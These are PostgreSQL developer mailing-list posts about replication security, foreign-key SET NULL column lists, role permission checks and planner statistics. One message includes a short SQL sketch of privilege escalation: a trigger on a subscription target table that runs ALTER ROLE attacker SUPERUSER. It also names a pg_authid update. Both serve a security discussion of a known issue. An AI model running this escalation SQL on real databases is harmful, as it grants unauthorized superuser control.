"replication connection" or "connection" to a specific database in the
error message [3] [4].

In this patch I have modified the conditions in libpq/auth.c to check
am_walsender && !am_db_walsender, as in hba.c. I have also added a
clarification in the documentation for pg_hba.conf.

>   The value `replication` specifies that the record matches if a
>   physical replication connection is requested (note that replication
> - connections do not specify any particular database).
> + connections do not specify any particular database), but it does not
> + match logical replication connections that specify
> + `replication=database` and a `dbname` in their connection string.

Thanks,
Paul

[1]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/postmaster/postmaster.c;h=7de27ee4e0171863faca2f24d62488b773a7636e;hb=HEAD#l2154

[2]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/libpq/hba.c;h=371dccb852fd5c0775c7ebd82b67de3f20dc70af;hb=HEAD#l640

[3]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/libpq/auth.c;h=545635f41a916c740aacd6a8b68672d10378b7ab;hb=HEAD#l420

[4]: 
https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/libpq/auth.c;h=545635f41a916c740aacd6a8b68672d10378b7ab;hb=HEAD#l487


pg_hba_conf_error_message_patch_v00.diff
Description: Binary data


Re: Why does creating logical replication subscriptions require superuser?

2021-01-22 Thread Paul Martinez
> We successfully created exploits against Aiven and AWS RDS services gaining
> superuser with their ways of subscription creation (and reported
> vulnerabilities, of course). Probably, you have this (not so scary)
> vulnerability too.

Can you share the rough idea of how these exploits work? What parts of the
current architecture allowed that to happen?

I read the thread regarding creating a special role for creating subscriptions,
and I think it helped me understand various aspects of the current architecture
better.

Please correct me if any of these points are incorrect:

Some of the original justifications for requiring superuser to create
subscriptions include:
- Replication inherently adds significant network traffic and extra background
  processes, and we wouldn't want unprivileged users to be able to add such
  drastic load to the database.
- Subjectively, creating a subscription is a "major" operation, so it makes
  sense to not allow every user to perform it.
- Running the apply process as a superuser drastically reduces the number
  of possible errors that might arise due to not having sufficient permissions
  to write to target tables, and may have simplified the initial
  implementation.
- Subscriptions store plaintext passwords, which are sensitive, and we
  wouldn't want unprivileged users to see these. Only allowing superusers
  to create subscriptions and view the subconninfo column is a way to resolve
  this.

Are there any other major reasons that we require superuser? Notably one may
wonder why we didn't check for the REPLICATION attribute, but even replication
users could run into table ownership and access issues.

Unless I'm mistaken, the apply worker process runs as the user that created
the subscription. Thus, it is the requirement that only superusers can create
subscriptions that leads to two warnings in the Security documentation:

https://www.postgresql.org/docs/current/logical-replication-security.html

> The subscription apply process will run in the local database with the
> privileges of a superuser.

This is a direct consequence of requiring superuser to create subscriptions
and running the apply process as the creator. If the subscription weren't
created by a superuser, then the apply process wouldn't run as superuser
either, correct?

> A user able to modify the schema of subscriber-side tables can execute
> arbitrary code as a superuser. Limit ownership and TRIGGER privilege on such
> tables to roles that superusers trust.

I believe a theoretical exploit here would involve the unprivileged user
creating a trigger with a function defined using SECURITY INVOKER and attaching
it to a table that is a subscription target. Since the apply process is running
as superuser, this means that the trigger is invoked as superuser, leading to
the privilege escalation. More accurately, a user able to modify the schema
of subscriber-side tables could execute arbitrary code as the _creator of the
subscription_, correct?
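
A rough sketch of that vector (illustrative names; assumes replicated_table
is a subscription target and the attacker can create triggers on it):

CREATE FUNCTION escalate() RETURNS trigger LANGUAGE plpgsql AS $$
BEGIN
  -- functions are SECURITY INVOKER by default, so this runs with the
  -- privileges of the apply worker, i.e. the subscription's creator
  ALTER ROLE attacker SUPERUSER;
  RETURN NEW;
END $$;
CREATE TRIGGER escalate_trigger BEFORE INSERT ON replicated_table
  FOR EACH ROW EXECUTE FUNCTION escalate();
-- triggers are skipped during replay unless marked ALWAYS or REPLICA:
ALTER TABLE replicated_table ENABLE ALWAYS TRIGGER escalate_trigger;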

So it seems privilege escalation to _superuser_ can be prevented by simply
making the owner of the subscription not a superuser. But this can already
happen now by simply altering the user after the subscription has been created.
I haven't tested this edge case, but I hope that Postgres doesn't crash if it
subsequently runs into a permission issue; I assume that it will simply stop
replication, which seems appropriate.


One other point:

One message in the thread mentioned somehow tricking Postgres into replicating
system catalog tables:

https://www.postgresql.org/message-id/109201553163096%40myt5-68ad52a76c91.qloud-c.yandex.net

I'm unsure whether this is allowed by default, but it doesn't seem like too
much trouble to run a modified publisher node that does allow it. Then
something like 'UPDATE pg_authid SET rolsuper = TRUE' could result in privilege
escalation on the subscriber side. But, again, if the apply process isn't
running as superuser, then presumably applying the change in the subscriber
would fail, stopping replication, and neutralizing the attack.


Thanks,
Paul




Why does creating logical replication subscriptions require superuser?

2021-01-21 Thread Paul Martinez
Hey, all,

I'm working with native logical replication, and I don't fully understand
why logical replication subscribers need to be superusers, nor do I fully
understand the implication of some of the comments made on this page:

https://www.postgresql.org/docs/current/logical-replication-security.html

> A user able to modify the schema of subscriber-side tables can execute
> arbitrary code as a superuser.

Does "execute arbitrary code" here really mean executing arbitrary code on the
machine that is running Postgres, or simply running arbitrary SQL in the
replicating database? Would it only be able to modify data in the database
containing the subscription, or could it modify other databases in the same
cluster? Is there any "blast-radius" to the capabilities gained by such a user?

According to the commit message that added this text, the callout of this
point was added as result of CVE-2020-14349, but the details there don't
really help me understand what the concern is here, nor do I have a deep
understanding of various features that might combine to create a vulnerability.

I'm not sure what arbitrary code could be executed, but my rough guess, based
on some of the other text on that page, is that custom triggers, written in
an arbitrary language (e.g., Python), would run arbitrary code and that is
the concern. Is that correct? And, if so, assuming that Python triggers were
the only way to execute arbitrary code, then simply building Postgres without
Python support would prevent users that can modify the schema from executing
code as superuser. What is the full set of features that could lead to running
arbitrary code in this scenario? Is it just all the different languages that
can be used to write triggers?

Essentially, I'm wondering what a loose proof-of-concept privilege escalation
vulnerability would look like if a non-superuser can modify the schema of
subscriber-side tables.

On a related note, what happens if a superuser creates a subscription, and then
is demoted to a regular user? My understanding is that the worker that applies
the logical changes to the database connects as the user that created the
subscription, so would that prevent potential vulnerabilities in any way?


Thanks,
Paul




[PATCH] Partial foreign key updates in referential integrity triggers

2021-01-06 Thread Paul Martinez
Hey, hackers!

I've created a patch to better support referential integrity constraints when
using composite primary and foreign keys. This patch allows creating a foreign
key using the syntax:

  FOREIGN KEY (tenant_id, fk_id) REFERENCES fktable ON DELETE SET NULL (fk_id)

which means that only the fk_id column will be set to NULL when the referenced
row is deleted, rather than both the tenant_id and fk_id columns.

In multi-tenant applications, it is common to denormalize a "tenant_id" column
across every table, and use composite primary keys of the form (tenant_id, id)
and composite foreign keys of the form (tenant_id, fk_id), reusing the
tenant_id column in both the primary and foreign key.

This is often done initially for performance reasons, but has the added benefit
of making it impossible for data from one tenant to reference data from another
tenant, also making this a good decision from a security perspective.

Unfortunately, one downside of using composite foreign keys in such a manner
is that commonly used referential actions, such as ON DELETE SET NULL, no
longer work, because Postgres tries to set all of the referencing columns to
NULL, including the columns that overlap with the primary key:


CREATE TABLE tenants (id serial PRIMARY KEY);
CREATE TABLE users (
  tenant_id int REFERENCES tenants ON DELETE CASCADE,
  id serial,
  PRIMARY KEY (tenant_id, id)
);
CREATE TABLE posts (
  tenant_id int REFERENCES tenants ON DELETE CASCADE,
  id serial,
  author_id int,
  PRIMARY KEY (tenant_id, id),
  FOREIGN KEY (tenant_id, author_id) REFERENCES users ON DELETE SET NULL
);

INSERT INTO tenants VALUES (1);
INSERT INTO users VALUES (1, 101);
INSERT INTO posts VALUES (1, 201, 101);
DELETE FROM users WHERE id = 101;
ERROR:  null value in column "tenant_id" violates not-null constraint
DETAIL:  Failing row contains (null, 201, null).


This can be resolved by manually creating triggers on the referenced table, but
this is clunky and adds a significant amount of extra work when adding (or
removing!) foreign keys. Users shouldn't have to compromise on maintenance
overhead when using composite foreign keys.

I have implemented a simple extension to the syntax for foreign keys that
makes it just as easy to support referential integrity constraints for
composite foreign keys as it is for single column foreign keys. The SET NULL
and SET DEFAULT referential actions can now be optionally followed by a column
list:

key_action:
  | NO ACTION
  | RESTRICT
  | CASCADE
  | SET NULL [ (column_name [, ...] ) ]
  | SET DEFAULT [ (column_name [, ...] ) ]

When a column list is provided, only the specified columns, which must be a
subset of the referencing columns, will be updated in the associated trigger.
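
Applied to the posts example above, the fix is a one-line change to the
foreign key (a hedged sketch of the intended behavior; the constraint name
is whatever Postgres generated):

ALTER TABLE posts DROP CONSTRAINT posts_tenant_id_author_id_fkey;
ALTER TABLE posts ADD FOREIGN KEY (tenant_id, author_id)
  REFERENCES users ON DELETE SET NULL (author_id);

DELETE FROM users WHERE id = 101;
-- posts now contains (1, 201, NULL): author_id nulled, tenant_id preserved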

Note that use of SET NULL (col1, ...) on a composite foreign key with MATCH
FULL specified will still raise an error. In such a scenario we could raise an
error when the user tries to define the foreign key, but we don't raise a
similar error when a user tries to use SET NULL on a non-nullable column, so I
don't think this is critical. (I haven't added this check in my patch.) While
this feature would mostly be used with the default MATCH SIMPLE, I could
imagine using SET DEFAULT (col, ...) even for MATCH FULL foreign keys.

To store this additional data, I've added two columns to the pg_constraint
catalog entry:

confupdsetcols int2[]
confdelsetcols int2[]

These columns store the attribute numbers of the columns to update in the
ON UPDATE and ON DELETE triggers respectively. If the arrays are empty, then
all of the referencing columns should be updated.
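
With the patch applied, the stored column lists for the posts example can
be inspected with something like:

SELECT conname, confupdsetcols, confdelsetcols
FROM pg_constraint
WHERE conrelid = 'posts'::regclass AND contype = 'f';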


I previously proposed this feature about a year ago [1], but I don't feel like
the arguments against it were very strong. Wanting to get more familiar with the
Postgres codebase I decided to implement the feature over this holiday break,
and I've gotten everything working and put together a complete patch including
tests and updates to documentation. Hopefully if people find it useful it can
make its way into the next commitfest!

Visual diff:
https://github.com/postgres/postgres/compare/master...PaulJuliusMartinez:on-upd-del-set-cols

Here's a rough outline of the changes:

src/backend/parser/gram.y | 122
src/include/nodes/parsenodes.h|   3
src/backend/nodes/copyfuncs.c |   2
src/backend/nodes/equalfuncs.c|   2
src/backend/nodes/outfuncs.c  |  47
- Modify grammar to add opt_column_list after SET NULL and SET DEFAULT
- Add fk_{upd,del}_set_cols fields to Constraint struct
- Add proper node support, as well as outfuncs support for AlterTableStmt,
  which I used while debugging

src/include/catalog/pg_constraint.h   |  20
src/backend/catalog/pg_constraint.c   |  80
src/include/catalog/catversion.h  |   2
- Add confupdsetcols and confdelsetcols to pg_constraint catalog entry

src/backend/commands/tablecmds.c  | 142
- Pass along data from parsed Constraint node to Creat

Re: [PATCH] Simplify permission checking logic in user.c

2020-12-30 Thread Paul Martinez
On Wed, Dec 30, 2020 at 12:28 PM Andrey Borodin  wrote:
> I think that sharing "various small changes to permission checks" is a really 
> good idea.
>
> > On 30 Dec 2020, at 20:39, Stephen Frost wrote:
> > In other words, I suspect people would be happier if we
> > provided a way for non-superusers a way to create replication roles and
> > bypassrls roles.
> +1 again. I hope we will return to the topic soon.

On Wed, Dec 30, 2020 at 9:26 AM Stephen Frost  wrote:
> While I do appreciate that it'd be nice if we made all of the code in
> the backend easier for folks to maintain their own patch sets against
> core, it'd also mean that we're now being asked to provide some level of
> commitment that we aren't going to change these things later because
> then we'd break $whomever's patches.  That's certainly not something
> that is really reasonable for us to agree to.
>
> I'd strongly suggest that, instead, you consider proposing changes which
> would address the actual use cases you have and work with the community
> to have those included in core, which would further have the added
> property that everyone would then benefit from those improvements.

On Wed, Dec 30, 2020 at 9:39 AM Stephen Frost  wrote:
>
> That really strikes me as pretty darn unlikely to happen, it's not like
> this code is really spread out across very many lines or that it's hard
> to see the pretty clear pattern.
>
> In thinking about these role attributes and the restrictions we have
> about what attributes don't require superuser to set and what do, I do
> feel like we're probably missing a bet regarding replication and
> bypassrls..  In other words, I suspect people would be happier if we
> provided a way for non-superusers a way to create replication roles and
> bypassrls roles.  Exactly how we do that is a bit tricky to figure out
> but that's certainly a much more productive direction to be going in.

Thanks everyone for taking a look!

You've identified exactly the problem we're running into -- we want to
allow customers, who aren't superusers, to create replication roles.

In Google Cloud SQL we create a role for customers, cloudsqlsuperuser,
which, confusingly, is not a SUPERUSER, but does have some extra
permissions. We've modified a lot of "if (!superuser())" checks to
"if (!superuser() && !cloudsqlsuperuser())".

That was actually what I initially tried to do when modifying this bit of
code:

  if (issuperuser)
    if (!superuser()) ereport(...);
  elsif (isreplication)
-   if (!superuser()) ereport(...);
+   if (!superuser() && !cloudsqlsuperuser()) ereport(...);
  elsif (bypassrls)
    if (!superuser()) ereport(...);
  else
    if (!have_createrole_privilege()) ereport(...);

But this inadvertently allowed cloudsqlsuperuser to _also_ create users
with the BYPASSRLS attribute by creating a user with both REPLICATION
and BYPASSRLS, which I only realized when a couple of tests failed.
Properly modifying the required permissions required separating the
if/else branches, which led to this patch.

From my understanding, AWS RDS Postgres takes a slightly different approach
and allows the REPLICATION attribute to be inherited through membership in
a special rds_replication role.



We haven't seriously considered what some sort of general functionality
would look like to support our managed Postgres use-cases, but here's a
rough sketch of what we're trying to accomplish with roles and permissions:

- We, ideally, want to give our customers access to as much of Postgres'
  functionality as possible, including SUPERUSER capabilities

- But we do not want customers to have access to the underlying VM or
  filesystem

- There are certain parts of the system (i.e., certain databases, tables,
  individual rows in catalog tables, etc.) that we want to manage and we
  can't allow customers to modify these at all. Examples include:
  - Our own SUPERUSER role that we use to connect to the cluster; customers
shouldn't be able to modify this role at all
  - Replication slots used for managed replication shouldn't be able to be
modified by customers (even if they have the REPLICATION attribute)

- We want to prevent customers from depending on any data we choose to store
  in other database, as that limits our flexibility to make future changes
  - Notably this means we only can support logical replication, and not
physical replication.

I suppose this could be roughly summarized as "90% of a superuser, but also
still obeys SQL privileges for objects created by someone else".

We would definitely be happy to explore what sort of functionality like this
would be useful for others!




[PATCH] Simplify permission checking logic in user.c

2020-12-29 Thread Paul Martinez
Hey, hackers,

As part of building Postgres for a managed environment in Google Cloud SQL,
we've made various small changes to permission checks to carefully limit what
customers have access to.

We were making some changes in src/backend/commands/user.c and noticed some
clunky logic related to verifying that the current user has sufficient
permissions to perform an action:

https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/commands/user.c;h=0e6800bf3e4f3f584bbb0b2f6f8ae999f5d94bf1;hb=HEAD#l288

The checks for whether the current user can create a user with the SUPERUSER,
REPLICATION, or BYPASSRLS attributes are chained together using if/else-if,
before finally checking whether the user has CREATEROLE privileges in a
final else. This construction is error-prone: once one branch is taken, the
later checks are skipped, which implicitly assumes that the permission required
by each earlier branch is a superset of the permissions checked later. Since
each attribute branch requires SUPERUSER this currently holds, but changing one
of the checks could inadvertently allow users without the CREATEROLE privilege
to create roles.

A similar construction is used later in the file in the AlterRole function:

https://git.postgresql.org/gitweb/?p=postgresql.git;a=blob;f=src/backend/commands/user.c;h=0e6800bf3e4f3f584bbb0b2f6f8ae999f5d94bf1;hb=HEAD#l717

This small patch simply modifies the code to replace the if/else-if chain with
separate if statements, and always checks whether the user has the CREATEROLE
privilege. (The have_createrole_privilege function includes another superuser
check.) Given the current checks in each branch, this code is equivalent, but
easier to modify in the future.
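
Sketching the patched structure (a paraphrase, not the literal diff):

  if (issuperuser)
      if (!superuser()) ereport(...);
  if (isreplication)
      if (!superuser()) ereport(...);
  if (bypassrls)
      if (!superuser()) ereport(...);
  if (!have_createrole_privilege()) ereport(...);

Each attribute is checked independently, and the CREATEROLE check always runs.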

- Paul


user-c-if-else-if.patch
Description: Binary data


Proposal: Adding isbgworker column to pg_stat_activity

2020-12-02 Thread Paul Martinez
Hey, all,

It is currently slightly difficult to determine how many background worker
processes are running, which is useful information when tuning the
max_worker_processes parameter. The best bet seems to be to use the
backend_type column and filter out the many types that are defined in
miscinit.c:

https://github.com/postgres/postgres/blob/REL_13_1/src/backend/utils/init/miscinit.c#L201-L253

I would like to propose adding a column, isbgworker, that simply stores
the value of the expression `beentry->st_backendType == B_BG_WORKER`,
which is already used in pg_stat_get_activity.

https://github.com/postgres/postgres/blob/REL_13_1/src/backend/utils/adt/pgstatfuncs.c#L854-L867

Such a column would make it easier to determine a suitable value for the
max_worker_processes parameter. Similar internal resource parameters all
seem to have more straightforward ways to gauge their current usage:

max_wal_senders:
  -> COUNT(*) FROM pg_stat_replication

max_parallel_workers:
  -> COUNT(*) FROM pg_stat_activity WHERE backend_type = 'parallel worker'

max_replication_slots:
  -> COUNT(*) FROM pg_replication_slots

max_connections:
  -> COUNT(*) FROM pg_stat_activity WHERE backend_type = 'client backend'
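
With the proposed column, max_worker_processes would fit the same pattern
(hypothetical, assuming the column is added as described):

max_worker_processes:
  -> COUNT(*) FROM pg_stat_activity WHERE isbgworker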


Thoughts? I think it should be pretty easy to implement, and it would
also be beneficial to update the documentation for all of the above
parameters with notes about how to determine their current usage.


Thanks,
Paul


(Note: I asked a question related to this on pgsql-general:
https://www.postgresql.org/message-id/CACqFVBaH7OPT-smiE0xG6b_KVGkWNNhZ2-EoLNrbzLFSUgN2eQ%40mail.gmail.com
)


Proper usage of ndistinct vs. dependencies extended statistics

2019-04-10 Thread Paul Martinez
Hello,

I have some questions about the different types of extended statistics
that were introduced in Postgres 10.
- Which types of queries are each statistic type supposed to improve?
- When should one type of statistic be used over the other? Should they
  both always be used?

We have a multi-tenant application and all of our tables have a denormalized
tenant_id column. (Most tables actually use the tenant_id as part of a
composite primary key on (tenant_id, id).)

As the docs suggest, we haven't created extended STATISTICS except when we've
observed the query planner choosing poor plans.

We've seen poor query plans on queries involving filters on foreign keys:

  Table: fk_table

    tenant_id | integer
    id        | integer
    fk_id     | integer

    PRIMARY KEY (tenant_id, id)
    FOREIGN KEY (tenant_id, fk_id) REFERENCES left_table(tenant_id, id)

The id columns on these tables are unique, so there is a functional dependence
between fk_id and tenant_id; if the fk_id columns are the same, then the
tenant_id columns must also be the same.

This table has ~4.6 million rows, ~1300 distinct values for tenant_id, and
~13000 distinct values for fk_id.

A single SELECT query that filters on tenant_id and fk_id erroneously
estimates that it will return a single row (4,600,000 / 1300 / 13,000 ~= 0.3):

=> EXPLAIN ANALYZE SELECT * FROM fk_table WHERE tenant_id = 100 AND fk_id = 1;
                                  QUERY PLAN
------------------------------------------------------------------------------
 Index Scan using fk_table_tenant_id_fk_id_index on fk_table
   (cost=0.43..4.45 rows=1 width=44) (actual time=0.016..1.547 rows=3113 loops=1)
   Index Cond: ((tenant_id = 100) AND (fk_id = 1))

In other places we've used a ndistinct statistic to solve this issue, but that
doesn't help in this case. Postgres still estimates that the query will return
a single row.

=> CREATE STATISTICS ndistinct_stat (ndistinct) ON tenant_id, fk_id FROM fk_table;
=> ANALYZE fk_table;
=> SELECT stxname, stxndistinct FROM pg_statistic_ext;
    stxname     |  stxndistinct
----------------+----------------
 ndistinct_stat | {"1, 3": 3433}
=> EXPLAIN ANALYZE SELECT * FROM fk_table WHERE tenant_id = 100 AND fk_id = 1;
-- (unchanged)

Why doesn't the ndistinct statistic get used when planning this query? (We're
currently on Postgres 10.6.) In contrast, if we create a functional dependency
statistic then Postgres will accurately predict the result size.

=> CREATE STATISTICS dep_stat (dependencies) ON tenant_id, fk_id FROM fk_table;
=> ANALYZE fk_table;
=> SELECT stxname, stxdependencies FROM pg_statistic_ext;
 stxname  |            stxdependencies
----------+---------------------------------------
 dep_stat | {"1 => 3": 1.00, "3 => 1": 0.060300}

=> EXPLAIN ANALYZE SELECT * FROM fk_table WHERE tenant_id = 100 AND fk_id = 1;
                                  QUERY PLAN
------------------------------------------------------------------------------
 Index Scan using fk_table_tenant_id_fk_id_index on fk_table
   (cost=0.43..1042.23 rows=612 width=44) (actual time=0.011..0.813 rows=3056 loops=1)
   Index Cond: ((tenant_id = 100) AND (fk_id = 1))

So, in general, which type of extended statistic should be used? Where do the
different kinds of statistics get used in the query planner? Is there an
advantage to using one type of statistic vs the other, or should we always
create both?

And in our specific example, with a schema designed for multi-tenancy, which
types of statistics should we use for our foreign keys, where tenant_id is
functionally dependent on the other foreign_id columns?
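
(As far as I can tell, a single statistics object can request both kinds at
once, e.g.:

  CREATE STATISTICS both_stat (ndistinct, dependencies) ON tenant_id, fk_id
  FROM fk_table;

but that doesn't tell us whether we should.)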

To explain where some of our confusion is coming from, here's the example where
adding an ndistinct statistic helped: Postgres was adding a filter after an
index scan instead of including the filter as part of the index scan.

big_table had ~500,000,000 rows,
~3000 distinct values for column a,
~3000 distinct values for column b,
but just ~4500 distinct values for the (a, b) tuple,
and column b was functionally dependent on column c.

Postgres wanted to do:

=> SELECT * FROM big_table WHERE a = 1 AND b = 10 AND c IN (100, 101, 102, ...);
Index Scan using big_table_a_b_c on big_table  (cost=0.57..122.41 rows=1 width=16)
  Index Cond: ((a = 1) AND (b = 10))
  Filter: c = ANY ('{100, 101, 102, 103, 104, 105, ...}')

But then we did:

=> CREATE STATISTICS big_table_a_b_ndistinct (ndistinct) ON a, b FROM big_table;
=> ANALYZE big_table;
=> SELECT * FROM big_table WHERE a = 1 AND b = 10 AND c IN (100, 101, 102, ...);
Index Scan using big_table_a_b_c on big_table  (cost=0.57..122.41 rows=1 width=16)
  Index Cond: ((a = 1) AND (b = 10) AND (c = ANY ('{100, 101, 102, 103, 104, 105, ...}')))

(This had very poor performance because Postgres thought it would have to
filter 500,000,000 / 3000 / 3000 ~= 55 rows, but actually it had to filter
500,000,000 / 4500 ~= 110,000 rows.)

Because of the functional 

Re: PATCH: Include all columns in default names for foreign key constraints.

2019-03-09 Thread Paul Martinez
Thanks for the comments!

On Fri, Feb 8, 2019 at 2:11 AM Peter Eisentraut wrote:
>
> On 13/01/2019 01:55, Paul Martinez wrote:
> > I pretty much just copied and pasted the implementation from
> > ChooseIndexNameAddition and placed it in src/backend/commands/tablecmds.c.
>
> The use of "name2" in the comment doesn't make sense outside the context
> of indexcmds.c.  Maybe rewrite that a bit.

Updated.

> > Regression tests are in src/test/regress/sql/foreign_key.sql. I create two
> > composite foreign keys on table, one via the CREATE TABLE statement, and the
> > other in a ALTER TABLE statement. The generated names of the constraints are
> > then queried from the pg_constraint table.
>
> Existing regression tests already exercise this, and they are failing
> all over the place because of the changes of the generated names.  That
> is to be expected.  You should investigate those failures and adjust the
> "expected" files.  Then you probably don't need your additional tests.
>
> It might be worth having a test that runs into the 63-character length
> limit somehow.

Yikes, sorry about that. Some tests were failing on my machine because of dynamic
linking issues, and I totally missed all the foreign key failures. I think I've
fixed all the tests, and I changed the test I added so it exercises the
63-character length limit.
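
For anyone following along, the 63-byte identifier cap is easy to observe
directly (an illustrative query, not part of the patch):

  SELECT char_length(repeat('a', 100)::name::text);  -- returns 63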

Attached is an updated patch.

- Paul


foreign-key-constraint-names-v2.patch
Description: Binary data


Re: [PROPOSAL] ON DELETE SET NULL () for Foreign Key Constraints

2019-01-19 Thread Paul Martinez
On Sat, Jan 19, 2019 at 5:12 PM Tom Lane  wrote:
>
> Paul Martinez  writes:
> > I have a proposal for a feature to add to Postgres. I believe it is a natural
> > extension to the current standard SQL ON DELETE SET NULL behavior when using
> > composite foreign keys. The basic idea is that you can specify which columns
> > to set to NULL in the DELETE trigger created by a foreign key constraint.
>
> This seems like kind of a kluge, because it can only work in MATCH SIMPLE
> mode, not MATCH FULL or MATCH PARTIAL.  (We don't have MATCH PARTIAL atm,
> but it's in the spec so I imagine somebody will get around to implementing
> it someday.  Anyway MATCH FULL is there now.)  In the latter two modes,
> setting a subset of the referencing columns to null isn't sufficient to
> make the row pass the constraint.

I don't see why this is an issue. Currently Postgres allows you to combine
the foreign key features in nonsensical ways. For example, you can create a
non-nullable column that has ON DELETE SET NULL behavior:

CREATE TABLE foo (a int PRIMARY KEY);
CREATE TABLE bar (b int NOT NULL REFERENCES foo(a) ON DELETE SET NULL);
INSERT INTO foo VALUES (1);
INSERT INTO bar VALUES (1);
DELETE FROM foo WHERE a = 1;
ERROR:  null value in column "b" violates not-null constraint

The incongruence of MATCH FULL with this feature doesn't seem like a problem.
If we were worried about users misusing the feature, we could raise an error
when MATCH FULL is combined with a proper subset of the constrained columns in
the SET NULL clause, but we don't raise an error for the similar logic error
above. I don't entirely understand the use-cases for MATCH PARTIAL, but it
doesn't seem like combining MATCH PARTIAL with this feature would be blatantly
wrong. This feature provides a real benefit when using MATCH SIMPLE, which is
the default behavior.

There are good reasons for denormalizing tenant_ids in a multi-tenant
application beyond just performance. It actually improves referential integrity
because it makes mixing data between tenants impossible. Consider the following
example:

-- denormalized tenant_id, but simple primary keys
CREATE TABLE tenants (id int PRIMARY KEY);
CREATE TABLE users (tenant_id int REFERENCES tenants, id int PRIMARY KEY);
CREATE TABLE messages (
  tenant_id int REFERENCES tenants,
  id int PRIMARY KEY,
  from_id int REFERENCES users,
  to_id int REFERENCES users,
  content text
);
-- Create three tenants
INSERT INTO tenants VALUES (1), (2), (3);
-- Create users in tenants 1 and 2
INSERT INTO users VALUES (1, 101), (2, 102);
-- Create message in tenant 3 sent from user in tenant 1 to user in tenant 2
INSERT INTO messages VALUES (3, 201, 101, 102, 'poor referential integrity');

If you create the users and messages tables with composite primary keys the
last query will fail:

-- composite primary keys of the form (tenant_id, id)
CREATE TABLE cpk_users (
  tenant_id int REFERENCES tenants,
  id int,
  PRIMARY KEY (tenant_id, id)
);
CREATE TABLE cpk_messages (
  tenant_id int REFERENCES tenants,
  id int,
  from_id int,
  to_id int,
  content text,
  PRIMARY KEY (tenant_id, id),
  FOREIGN KEY (tenant_id, from_id) REFERENCES cpk_users,
  FOREIGN KEY (tenant_id, to_id) REFERENCES cpk_users
);
-- Create cpk_users in tenants 1 and 2
INSERT INTO cpk_users VALUES (1, 101), (2, 102);
-- Create cpk_message in tenant 3 sent from user in tenant 1 to user in tenant 2
INSERT INTO cpk_messages VALUES (3, 201, 101, 102, 'great referential integrity');
ERROR:  insert or update on table "cpk_messages" violates foreign key constraint
"cpk_messages_tenant_id_from_id_fkey"
DETAIL:  Key (tenant_id, from_id)=(3, 101) is not present in table "cpk_users".

So there are strong reasons in favor of using composite primary keys. Postgres
has great support for composite primary and foreign keys, but SET NULL behavior
that would have worked fine in the schema using simple primary keys no longer
works in the composite primary key schema. Users could manually implement
triggers to get the desired behavior (as I have done in the use-case that led
me to think of this feature), but it'd be great if switching to composite
primary keys didn't force the user to make compromises elsewhere.
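
For reference, here's a sketch of the kind of trigger workaround I mean, using
the cpk_* tables above (names here are made up; the foreign keys keep their
default NO ACTION behavior, and a BEFORE DELETE trigger clears only the user
id columns):

CREATE FUNCTION clear_message_user_refs() RETURNS trigger AS $$
BEGIN
  -- Clear only the user references; tenant_id stays intact.
  UPDATE cpk_messages SET from_id = NULL
    WHERE tenant_id = OLD.tenant_id AND from_id = OLD.id;
  UPDATE cpk_messages SET to_id = NULL
    WHERE tenant_id = OLD.tenant_id AND to_id = OLD.id;
  RETURN OLD;
END;
$$ LANGUAGE plpgsql;

CREATE TRIGGER cpk_users_clear_message_refs
  BEFORE DELETE ON cpk_users
  FOR EACH ROW EXECUTE PROCEDURE clear_message_user_refs();

This works, but it duplicates knowledge of the foreign key in a second place,
which is exactly what the proposed syntax would avoid.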

- Paul


[PROPOSAL] ON DELETE SET NULL () for Foreign Key Constraints

2019-01-19 Thread Paul Martinez
Hello!

I have a proposal for a feature to add to Postgres. I believe it is a natural
extension to the current standard SQL ON DELETE SET NULL behavior when using
composite foreign keys. The basic idea is that you can specify which columns to
set to NULL in the DELETE trigger created by a foreign key constraint. (There
could be similar support for UPDATE triggers and SET DEFAULT actions.)


PROBLEM:

Consider the following basic schema:

CREATE TABLE users (id int PRIMARY KEY);
CREATE TABLE posts (
    id int PRIMARY KEY,
    content text,
    author_id int REFERENCES users(id) ON DELETE SET NULL
);

When a user is deleted all of their posts will have the author_id field set to
NULL.

Consider the same schema in a multi-tenant application. In a multi-tenant
application a tenant_id column will frequently be denormalized across every
table. In certain cases these tables will actually use the tenant_id as part of
a composite primary key. (This is the approach recommended by Citus.)

So in a multi-tenant architecture, our schema may look like this:

CREATE TABLE tenants (id int PRIMARY KEY);
CREATE TABLE users (
tenant_id int,
id int,
PRIMARY KEY (tenant_id, id)
);
CREATE TABLE posts (
tenant_id int,
id int,
content text,
author_id int,
PRIMARY KEY (tenant_id, id),
FOREIGN KEY (tenant_id, author_id)
REFERENCES users(tenant_id, id) ON DELETE SET NULL
);

In this situation we can no longer delete a user that has created a post
because Postgres would try to set both the author_id AND the tenant_id columns
of a corresponding post to NULL, and tenant_id is not nullable.

INSERT INTO tenants VALUES (1);
INSERT INTO users VALUES (1, 101);
INSERT INTO posts VALUES (1, 201, 'content', 101);
DELETE FROM users WHERE id = 101;
ERROR:  null value in column "tenant_id" violates not-null constraint
DETAIL:  Failing row contains (null, 201, content, null).


GENERAL SOLUTION:

My proposal is to allow specifying which columns to set null during the delete
trigger:

CREATE TABLE posts (
...,
FOREIGN KEY (tenant_id, author_id)
REFERENCES users(tenant_id, id) ON DELETE SET NULL (author_id)
)

If this feature is implemented the above DELETE statement would succeed, and
the record in posts would have the values (1, 201, 'content', NULL).

The grammar will be modified as follows:

table_constraint is:

  FOREIGN KEY ( column_name [, ... ] ) REFERENCES reftable [ ( refcolumn [, ... ] ) ]
      [ MATCH FULL | MATCH PARTIAL | MATCH SIMPLE ]
      [ ON DELETE action ] [ ON UPDATE action ]

action is:

  NO ACTION |
  RESTRICT |
  CASCADE |
  SET DEFAULT [ ( defcolumn [, ...] ) ] |
  SET NULL [ ( nullcolumn [, ...] ) ]

This modification to the grammar makes it easy to support similar
functionality for UPDATE triggers and the SET DEFAULT action.

The columns that we want to set to null must be a subset of the columns that
make up the foreign key. From looking through the grammar it seems like this
syntax will also be supported in column constraints; later validation could
ensure that only the single constrained column appears in the column list.

To store this new information, a new field will need to be added to
pg_constraint to save which columns we're supposed to set null. Since a
constraint could have separate ON DELETE and ON UPDATE behavior, we'd need two
additional columns if both were supported.

Name           Type    References           Description
-------------  ------  -------------------  --------------------------------
conkey         int2[]  pg_attribute.attnum  List of constrained columns
confkey        int2[]  pg_attribute.attnum  List of referenced columns
